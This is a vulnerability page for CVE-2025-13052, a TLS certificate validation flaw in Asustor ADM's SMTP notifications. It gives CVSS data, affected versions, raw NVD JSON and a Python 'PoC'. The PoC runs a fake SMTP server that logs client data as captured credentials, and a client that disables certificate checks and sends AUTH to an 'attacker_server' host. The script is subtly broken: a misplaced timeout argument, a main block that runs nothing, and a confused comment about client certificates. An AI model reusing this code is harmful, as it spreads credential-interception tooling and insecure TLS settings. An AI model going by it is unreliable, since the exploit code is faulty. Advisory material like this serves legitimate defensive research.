CVE-2025-13052

Description

When the user set the Notification's sender to send emails to the SMTP server via msmtp, an improper validated TLS/SSL certificates allows an attacker who can intercept network traffic between the SMTP client and server to execute a man-in-the-middle (MITM) attack, which may obtain the sensitive information of the SMTP. Affected products and versions include: from ADM 4.1.0 through ADM 4.3.3.RKD2 as well as from ADM 5.0.0 through ADM 5.1.0.RN42.

CVSS Details

CVSS Score

5.9

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:asustor:data_master:*:*:*:*:*:*:*:* - VULNERABLE

Asustor ADM 4.1.0 至 4.3.3.RKD2

Asustor ADM 5.0.0 至 5.1.0.RN42

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-13052 PoC - Asustor ADM SMTP MITM Attack Simulation
This PoC demonstrates the TLS certificate validation weakness in Asustor ADM SMTP client.
Note: This is for educational and authorized testing purposes only.
"""

import socket
import ssl
import struct
import time

def create_fake_smtp_server():
    """
    Create a fake SMTP server to demonstrate MITM vulnerability.
    In a real attack, this would be positioned between the client and legitimate server.
    """
    context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    # Using a self-signed certificate - vulnerable system would accept this
    context.load_cert_chain('attacker_cert.pem', 'attacker_key.pem')
    
    # Vulnerable: Not verifying client certificates properly
    context.verify_mode = ssl.CERT_NONE  # This is the weakness!
    
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_socket.bind(('0.0.0.0', 465))
    server_socket.listen(5)
    
    print("[*] Fake SMTP server listening on port 465")
    print("[*] Accepting connections without proper certificate validation")
    
    while True:
        client_socket, addr = server_socket.accept()
        print(f"[*] Connection from {addr}")
        
        # Handle SMTP communication and capture credentials
        try:
            ssl_socket = context.wrap_socket(client_socket, server_side=True)
            
            # Read SMTP commands
            data = ssl_socket.recv(1024)
            print(f"[*] Received: {data.decode()}")
            
            # Log captured data (in real attack, this would be credentials)
            log_captured_data(data)
            
        except Exception as e:
            print(f"[!] Error: {e}")

def log_captured_data(data):
    """Log captured SMTP communication data"""
    with open('captured_smtp.log', 'a') as f:
        f.write(f"{time.ctime()}: {data.decode('utf-8', errors='ignore')}\n")
    print("[+] Data captured and logged")

def simulate_vulnerable_client():
    """
    Simulate vulnerable Asustor ADM SMTP client behavior.
    Demonstrates how the client accepts invalid certificates.
    """
    context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    
    # VULNERABLE: Disabling certificate verification
    context.check_hostname = False
    context.verify_mode = ssl.CERT_NONE
    
    try:
        with socket.create_connection(('attacker_server', 465, timeout=10)) as sock:
            with context.wrap_socket(sock, server_hostname='smtp.example.com') as ssock:
                print("[*] Connection established (VULNERABLE - no cert verification)")
                print(f"[*] Server certificate: {ssock.getpeercert()}")
                
                # Send authentication (will be captured by MITM)
                ssock.send(b"AUTH LOGIN\r\n")
                ssock.send(b"\r\n")  # Username
                ssock.send(b"\r\n")  # Password
                
    except Exception as e:
        print(f"[!] Connection failed: {e}")

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-13052 PoC - Asustor ADM SMTP TLS Validation Flaw")
    print("=" * 60)
    print("[!] WARNING: For authorized testing only")
    print("[*] This PoC demonstrates the MITM vulnerability in SMTP TLS handling")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13052
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13052
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13052/
[4] VulDB https://vuldb.com/cve/CVE-2025-13052
[5] https://www.asustor.com/security/security_advisory_detail?id=49

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13052", "sourceIdentifier": "[email protected]", "published": "2025-12-12T03:15:50.070", "lastModified": "2026-01-28T14:53:53.883", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "When the user set the Notification's sender to send emails to the SMTP server via msmtp, an improper validated TLS/SSL certificates allows an attacker who can intercept network traffic between the SMTP client and server to execute a man-in-the-middle (MITM) attack, which may obtain the sensitive information of the SMTP.\n\nAffected products and versions include: from ADM 4.1.0 through ADM 4.3.3.RKD2 as well as from ADM 5.0.0 through ADM 5.1.0.RN42."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:H/SI:H/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-295"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:asustor:data_master:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.1.0.RHU2", "versionEndExcluding": "4.3.3.ROF1", "matchCriteriaId": "36FDF2DA-A9E9-4BC6-BC65-97C877697359"}, {"vulnerable": true, "criteria": "cpe:2.3:o:asustor:data_master:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0.ra82", "versionEndExcluding": "5.1.1.RCI1", "matchCriteriaId": "9EAB743A-59CB-48AD-9CA0-9C3B714B83E5"}]}]}], "references": [{"url": "https://www.asustor.com/security/security_advisory_detail?id=49", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}